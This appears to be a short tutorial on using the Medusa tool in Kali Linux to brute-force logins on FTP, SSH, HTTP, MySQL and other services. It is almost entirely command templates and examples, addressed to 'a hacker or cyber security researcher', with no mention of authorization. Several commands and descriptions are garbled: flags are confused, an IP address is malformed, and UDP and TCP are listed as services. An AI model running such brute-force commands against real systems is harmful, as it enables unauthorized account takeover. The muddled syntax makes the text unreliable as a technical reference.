a) It is very important tool of kali Linux that is used to perform brute force attack on different services of a website like ftp, ssh, udp, http, mysql, tcp, and also on login page of website very fast. It is very important and easy to use. So, a hacker or cyber security researcher must learn it like hydra for fast brute force attack. Now we will discuss the main commands of medusa for brute force attack.
TO SEE ALL OPTION OF MEDSA:
(medusa)
TO PERFORM SIMPLE BRUTE FORCE ATTACK:
(medusa -h + ip address of target -U + username’s list path -P + password list path -M + service to attack) e.g.
(medusa -h 192168.0.1 -U /root/Desktop/users.txt -P /root/Desktop/pass.txt -M http)
TO ATTACK ON SERVICE IF USERNAME IS KNOW:
(medusa -h + ip address of target -U + username list of path -P + path of password list -M+ service) e.g.
(medusa -h 192.168.8.1 -u /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ftp)
Password found in medusa for ftp service of target
TO ATTACK ON OF IP ADDRESS:
(medusa -H + ip address of target -U + user name list of path -P + path of password list -M+ service) e.g.
(medusa -H 192.168.8.1 -u /root/Desktop/user.txt -P /root/Desktop/pass.txt -M udp)
TO SAVE USERNAME AND PASSWORD IN A FILE DURING ATTACK:
(medusa -h + ip address of target -U + username list of path -P + path of password list -M+ service -o + path of file to save) e.g.
(medusa -h 192.168.1.8 -U /root/Desktop/users.txt -p /root/Desktop/pass.txt -M mysql -o /root/Desktop/login.txt)
TO ENABLE SSL DURING ATTACK:
(medusa -h + ip address of target -U + username list of path -P + path of password list -M+ service -s) e.g.
(medusa -h 192.168.8.1 -U /root/Desktop/users.txt -P /root/Desktop/pass.txt -M ftp -s)
TO SET A TIME FOR ATTACK BETWEEN TWO ATTACK:
(medusa -h + ip address of target -U + username list of path -P + path of password list -M+ http -g + time) e.g.
(medusa -h 192.168.8.1 -U /root/Desktop/users.txt -P /root/Desktop/pass.txt -M http -g 5)
TO STOP ATTCK AFTER USERNAME AND PASSWORD:
(medusa -h + ip address of target -U + username list of path -P + path of password list -M+ service -f) e.g.
(medusa -h 192.168.8.1 -U /root/Desktop/users.txt -P /root/Desktop/pass.txt -M http -f)
TO SEE DETAILS DURING ATTACK:
(medusa -h + ip address of target -U + username list of path -P + path of password list -M+ service -q -v +no) e.g.
(medusa -h 192.168.8.1 -U /root/Desktop/users.txt -P /root/Desktop/pass.txt -M ftp -q -v 5)
TO SET A VERIFICATION TIME FOR USERNAME AND PASSWORD DURING ATTACK:
(medusa -h + ip address of target -U + username list of path -P + path of password list -M+ service -c + time -f) e.g.
(medusa -h 192.168.8.1 -U /root/Desktop/users.txt -P /root/Desktop/pass.txt -M http -c 200 -f)
These were some main commands of medusa but you can modify them with different options for effective brute force attack. So best of luck.